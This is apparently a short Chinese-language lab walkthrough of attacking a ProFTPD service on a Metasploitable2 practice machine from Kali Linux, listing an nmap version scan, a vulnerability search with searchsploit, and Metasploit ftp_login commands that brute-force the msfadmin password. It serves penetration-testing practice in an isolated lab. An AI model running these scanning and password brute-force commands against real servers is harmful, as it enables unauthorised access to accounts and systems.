ProFTPD:一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序 http://www.proftpd.org/
实验环境:
攻击机:kali linux
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129
攻击过程:
step1:探测
nmap -sV -p 2121 192.168.172.129 //探测目标proftpd版本信息
step2:搜索目标漏洞信息
1.打开“www.exploit-db.com”网站 查询对应的软件版本信息,查看是否具有漏洞利用信息
2.命令:searchsploit proftpd //查看某软件漏洞信息
step3:暴破密码,启动msf
命令:use auxiliary/scanner/ftp/ftp_login
show options
set rhosts 192.168.172.129
set username msfadmin
set pass_file /root/Desktop/password.txt
set rport 2121
step4:开始暴破
命令:exploit
暴破成功